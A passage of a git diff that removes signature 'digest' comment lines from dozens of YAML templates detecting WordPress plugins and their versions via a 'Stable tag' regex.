b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207661259767b34b575c3b62d6def13cd26904ad715fab277357425e4a326044830220012d94b2db3c8916a45df942b44230acb2d880e74e129da04e93c66a00c07e23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index c4d839e025..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c619ee565f33f559dadf3dba433519710b2bcdb31b4d713f6cc0eac8f3295a390221009b78203c2ad655b5cedf92a7b0c4d7292c8f8d01e778b0bcb3ce5fbe26e680e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index aea1101042..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009995fd1eb739624af5a45081492ab9d789affe57a992452a4f47ce6704c7ac45022100bc1c1bfa6f0ab285895fbc40f822ac143491707bbd617db7205aea313a6e19b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 0a88fc0f69..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f19e8a397e663c259634f359aa6ec0b254ac2af59ad58ceb8e4c1b71b0941d902203a2864482e54678285edaadbdfaff33d0e9f50bfcaf475159e4c8da64b8de3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 4c087ff8a5..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b5aa206522d9ea62c9d51ba7249f518820cd5df11978faacfda970551ff3f17402202489de3fa827c139ca96809beffac4c7642e1f1bde349dab360563c992865e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 6b5782d2be..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee1f736d50f9ecec5c138c0a73ffae8a9c5142fb818267a5d0ba862a51d18b12022100f11b30423a218585a0bfaedd909f4794fc2d8c5c51f85413a3c9f15aead781f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index d67cff872f..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b3a49e7fb981579e01c93dc357f4d20d7c8cf891dee9d16aa4b2ff4e2660e7ee0220010c2c571ccee17657ac3caa9a65c59d8fbf999d1546e0e332a1fc7b56edf22c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 897db998b2..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8e7dda59b35e9989dca02c40f48ccdd09a7240da618a3e00f13e07fa2e830c9022059777de1078533ea523befb42579cae67f3564dbaa424104f4d99fb06ab94067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 889d236f7e..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022071607a99422a141c2686dc0bf8ed60377eead1c5853333ac768c118a625a9016022100ceadca0a1dae32fd1cadbed1a39a9f0dccbe2bedac631809f2129cb3c7d3178a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 0851b7658a..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ad50a3405937407abeddf664490774cc80cf9bbe8e4ec863857747826b094a6022100c65cdf238d1631b4d2159aa8c6c4a028b99aa0c00e02ebd7dfe12f873a1ff385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 41dd965306..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099fd7a9477854fdb7b3bce3067ecba37226c2931d212bbf66aad2250b94693cb022100f361f0b13b75f7759f226cb41703f76bb8bcdda4b0d72d251cf7f474a30e028f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 55992a26c7..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de04fa11258c970c7bb3fb1c6144443d9dccd135f82bf2f9e7dba194364831ef022070e86318488874c7bf3ed0d8eff6bb1a499be0282aaccf07e6bc2279d92311ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 885c0137b3..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b2971a4d5c5fc7b3474fcfd531ee7c4fd2aa3ebf2741167b167031adb2f7db00221008d5e9281f65890211cca4d56d6d5f532beb6bba336b3b824aa88dadac737cec7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index dcdf934164..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ca9dba54217b08157feacb92e37ed545654228d016901673c312ebb3551d0e6c02201cf02875a1802f283528c105221aa4f2fc454f28f66a57175dfb730581d3c879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 9f39906f8a..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202ad6de2a233dafc7625eb6fd8ff8fd820eaa5c720bc94e9769634173f105f102022100de84a3d9af25f4948cf5c878dc4366c7f73f8f008e2b309f0f54a4e20571f9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index cb74c3fef5..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009e3ec6f149f2ba7beec14b0fbbcc3eeaa72e6411c8903a0225ef51cd8a99521202203033825b4d0512ecb4b2709c83a76090573013ff368863e4a0f8f02ba08a73e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index bcd7f74100..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207026962b81161d5292fcada1fa9c85f19411792c8a17bee9f0ce908c2af0dd1b022014907a94a8a9eca2a0f5c825fe93ebb38ab2450eac0b07ff609e08b83f0b8a77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index ea496cb295..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220289e42219da0d13ec48ab7281b2f1d577bfad1bbde809df114b9aef38415f533022070d626db6bb824f71f371fe142ba68ac43276030de1e46f19b55d4cc62beee2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 45eb468521..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a4fd4aeb28aac55922c0eb40ff7d8b735cbc20011a6d7cfed23d07652427eb0d0220028130de15abb7ed32471193b742643d223ee700b82e1f5d7fc8f9256d418984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 25d90913f3..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eba49122193da2aab31e9d3077b0a8b8d13418307a20ea25d0de04bc36fcabc1022100ad93bd4236bdeba28055abc6bef96216fbdaec7b05499359d72bc8057258ccb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index e79a8be24f..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220137eee58c2c9c04e94d9c46b4657ade0b6cd89e329a8d99802849e9b9c4dc152022011e702089521fd1e20ecbf1988f28d9ae807f9da4953baf96ef33f9669624140:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index ed8a84f22b..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c81853967be2659ebd05c24fabfd97ac91f9f642cdea6f6327e229e15c39d969022100f31e3c7a3b6dfc6e73df5b752b3219817e1b0efafd143d4f9b79f5d3c64f008d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 6bef664046..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206db41b520c857f4e7ad5aca3f5c9a19d6c1ccba72159d6cecae7db07b6c97856022100b911a26c2ca1953d016743f82a40aeae51de7347cfa0de1ece0ddbb1560ca360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 12b03224d0..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205f4ca3f41e3ffb41eaf05c3e0f9611b5638712164049a8136a2848e89b853d1102205998fe4be599c8cdfee9b10422f96139cc4029928b633af530ba8377e7a22d17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 4fdf86e629..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a680246bd12dcfa75d62fdc6fcb2c462bdff3cc57cfcc6fcf69f390c749dd24602206a8589748436fc20c7c66168ce3a60e7fc3befdfb4c6fa8424a44173d57d0875:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 5a543076a0..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051e2fe0555414d68749b25b5212c418cfeec08fc80db65a336f8ac94228cf48402202a14651e39db848db5f14b6d74e894e5df6ebcb8b1caf7a6288246075625529b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 23713a1d5c..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022021dfeb19002a0e6c866fa6ddd4c98e4f4aff1a22ba7a56a15202e3ca7b2b5034022100b375dff94d0f11349179b0974725a3e92786abbb7860a562166b0aebe73008ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index be375ec15c..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bdb772cb5e39f4645125b28d1bd5227f3dbc72c4ab8f97774d6be7266b5b1f9c02200e4e140db8e420c775e4316a8f51bb4d01724f3c3cde5a5587b10ab100d2d2b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 70fc943b30..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205828c6db9dbf3f4775cd055f5602ad5d3793d7d8c3219232d1ad1c19a5cb47f60221009ac64c04f4ce119ac907421a2cf065a3b9d62ab108481dd9d6be958ca2b04ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index b522b83946..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008eb7bf8c61745a818ca8782f998dbc7ea5300cb3aedd67a17b499c758742322e022017428cdd58736b9cd46053485732e51bf00b183c3b400eb39cfffb072e8d161e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index a793a544de..4e5046273d 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022008757aff10f4a9efb2d144bfdfba39f8e49ea4e5dbc3c2368f7f62c27e3aa2db022024c6359f5433e11b347ace9539cdb5c2894283acc394c316ecc245339c7c2af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 6fa22f1dde..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220625c16f54831eec427a9a0b9cc3cafcb1552407fcbb41f0e811abfdc83c78cf0022025dd46c94b7744563c0b9b0042bc230eb82c03bee8724600f9dc19febfaa16f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 2d06be71f6..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205b6fe202630eafa3669553a0145d2604b00f10da73e8eae8db07746e9a9a422402210080a51dc11070b12488ad5570653488aea87ce08b8fb64bed483b12724221e759:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 5127f19bf0..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b61a8f91a784d0085339bece7855ef2a03750a9639c617eb116192e77f3fcacc02202467e1e4f9af31d82c6d89739b40665a8f381e3ccdb072c4d2134d0489b333b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 132cf63ba3..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008706c7fdac4f2de7e30649085d5f8f244f520b8c29620a8ad1e648995d6f47f902200c1c255a9b5b30b2c9555d4734cdaed377664623db2275d78816912b78116c8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 95f1d8b297..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b159fe992022851b4ae6ad222f45f4ccfddcc1984a7472b0423dc51d84cb81fa022100df218c3f3060d9cd7497f6458742971d426128a18ab4114d1a79ad9ee64213b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 61d1ee5459..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210094ab14a309f783334e52f957b2c6b7b4562081cf3b1019369b6dd01309ee8bd5022042dc34231b79ef6999ea60c3ed298078bf9cafa9ecd4ae058ba215c6768f9552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 700acbf55b..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ba569b02121fa7aedb1ad549c854ed55780fc91a97e83adcf7a807818c0470e60221009a3c9b939ad6a4e7a0121e9cc371130f8ecda1f1de4bb54c6667350b0034a30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 2f717aec59..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bb4339262e2b0bb2c984e13e898a11237bf25b01f882449fe12acc1f45835f4202200e6121ad5d36ba02e9731b5e62c1c997dcf517b1098ed05c1f2974ddfa312d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 9d2078cc0f..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ee0f0aa68b175c07bb72442f2cda7d8ded3af1fd6b30b781c17a39a90270f330022100f17318848634f978110f6956110101693811ee5e1d63f1127314dd0d70258d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 09784113a4..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015d1de6748e8a7e3fbf8e263646eaf4a7437194bd4632f27d477d7d7fd2bafb8022007d8f64d46bba345fe3fda4482ed3c901ff27cc5850133a3eeaa8818596a1482:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 31dc3d1929..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206c9bbe85465b4cf210d0e9d29b13ea9c38ce6bad14ccdbd6d36082bebe19939d02200ad1b63d6015c1d13b364ea3dd519b2ea1e988c3d229d6f32725bc864b56409e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 0f55259542..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202807d7ea3afebd66ae5159c757345783e2afcd44d8ecc6e8bc4bd529b4d3b26b022100a8a803b19bde035ce9211378bc1b97794c07032e1c5276a103e70b699d9867dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index fdafa134b1..e7e7c27682 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022075b36fce6e0b5c91c4bf083bf9f12ca1158d5458cae4b921e5df05d6ecd134a60221009edddf2d82f65b8d2f1f33a030d1d52856338f0ab10bf519930f2d3c455cfd5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad92475239..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fed5c074304f2c25f9a65871cb950fab95296df028cc2b2fcb45e603082df7ac0221009e1bbbf60f165105690bcf44e7ca2043186cb908cd64b6b05246c0c504349a2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 2fdd779b00..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022021c8ceb63da221a1f9e015e3575d7eba1835d019f8a8412f00d602923091c404022007837b8090d7e70ff254abd35427e3eac9d97f4314a0cc8618b643e85ccf4d62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index f57eeb2c83..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100dd6ba31acd4647c2731a98d8185c01092158faf66fda3f1411c428751f16ba07022100d63e6a4207f6aac01e5b78f644d29daeaf6ab9d164c794490eae8c7253d97195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 76ad03f943..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 